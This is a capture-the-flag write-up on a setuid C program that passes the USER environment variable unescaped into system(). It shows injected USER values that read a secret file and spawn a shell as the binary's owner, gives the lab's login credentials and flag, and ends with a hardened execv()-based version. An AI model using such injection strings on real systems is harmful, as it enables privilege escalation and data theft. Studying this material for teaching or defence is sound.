Description
Log on as guest (password: shu1eKoo) on machine 37.187.22.21.
You will find the hidden validation key in /home/exploit01/.secret.

$> ssh guest@37.187.22.21
Resolution
We were given these files:
guest@ns314076:/home/exploit01/project$ ls -la
total 24
dr-xr-xr-x 2 exploit01 exploit01 4096 Apr 29 15:17 .
dr-xr-xr-x 3 exploit01 exploit01 4096 Apr 29 15:18 ..
-r--r--r-- 1 exploit01 exploit01  208 Apr 29 15:16 Makefile
-r-sr-sr-x 1 exploit01 exploit01 5590 Apr 29 15:17 vulnerable
-r--r--r-- 1 exploit01 exploit01  345 Apr 29 15:13 vulnerable.c
The source of the “vulnerable” binary is provided, so let’s look at it. Note the s bits in the listing above: the binary is setuid and setgid exploit01, so it runs with that user’s privileges.
guest@ns314076:/home/exploit01/project$ cat vulnerable.c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main()
{
    char *buffer = NULL;
    gid_t gid = getegid();
    uid_t uid = geteuid();

    /* make the effective (setuid/setgid) ids the real ones as well */
    setresgid(gid, gid, gid);
    setresuid(uid, uid, uid);

    /* USER comes from the caller's environment and is pasted, unescaped,
     * into a command string that system() hands to /bin/sh -c */
    asprintf(&buffer, "/bin/echo %s is using this program!", getenv("USER"));
    system(buffer);

    return EXIT_SUCCESS;
}
As we can see, the string handed to system() is built from the USER environment variable, so whatever we put there is parsed by the shell as part of the command.
By default, $USER holds the name of the currently logged-in user.
guest@ns314076:/home/exploit01/project$ echo $USER
guest
So if we run the binary as is, it prints guest:
guest@ns314076:/home/exploit01/project$ ./vulnerable
guest is using this program!
Now let’s replace “guest” with a few commands separated by semicolons.
We set USER so that the command becomes “/bin/echo me;cat ../.secret; echo is using this program!”:
guest@ns314076:/home/exploit01/project$ export USER='me;cat ../.secret; echo'
Then we relaunch the program:
guest@ns314076:/home/exploit01/project$ ./vulnerable
me raht6ae1Ue is using this program!
The flag is raht6ae1Ue.
By the way, if we wanted to get a shell, it would be possible using:
guest@ns314076:/home/exploit01/project$ export USER='me;/bin/sh;'
guest@ns314076:/home/exploit01/project$ ./vulnerable
me
sh-4.2$ cat /home/exploit01/.secret
raht6ae1Ue
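For comparison, here is the hardened form of the same program as an added example (not part of the original writeup or the challenge files): the message is still printed by /bin/echo, but through execv() with the user name as a single argv element, so the semicolons in USER are never seen by a shell. The function names and the output-capture plumbing are mine.

```c
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hardened replacement for the page's asprintf()+system() pair: /bin/echo is
 * executed directly and `user` is handed over as ONE argv element, so no shell
 * ever parses it and ';' stays literal. The child's stdout is captured into
 * `out` (NUL-terminated). Returns the byte count captured, or -1 on failure. */
ssize_t echo_user_safe(const char *user, char *out, size_t outlen)
{
    int fd[2], status;
    if (pipe(fd) == -1)
        return -1;
    pid_t pid = fork();
    if (pid == -1)
        return -1;
    if (pid == 0) {                       /* child: stdout -> pipe, then exec */
        char *const argv[] = { "/bin/echo", (char *)user,
                               "is using this program!", NULL };
        close(fd[0]);
        dup2(fd[1], STDOUT_FILENO);
        close(fd[1]);
        execv(argv[0], argv);             /* no PATH lookup, no shell */
        _exit(127);                       /* only reached if execv fails */
    }
    close(fd[1]);                         /* parent: read until EOF */
    size_t total = 0;
    ssize_t r;
    while (total + 1 < outlen &&
           (r = read(fd[0], out + total, outlen - 1 - total)) > 0)
        total += (size_t)r;
    out[total] = '\0';
    close(fd[0]);
    waitpid(pid, &status, 0);
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? (ssize_t)total : -1;
}

/* Returns 1 if the hardened echo for `user` prints exactly `expected`.
 * Note: a setuid program should not trust getenv("USER") at all; derive the
 * name from getpwuid(getuid()) instead of the caller-controlled environment. */
int echo_user_gives(const char *user, const char *expected)
{
    char buf[256];
    return echo_user_safe(user, buf, sizeof buf) >= 0 && strcmp(buf, expected) == 0;
}
```

With the injection string from this writeup as input, the output is the literal text “me;cat ../.secret; echo is using this program!” and nothing else is executed.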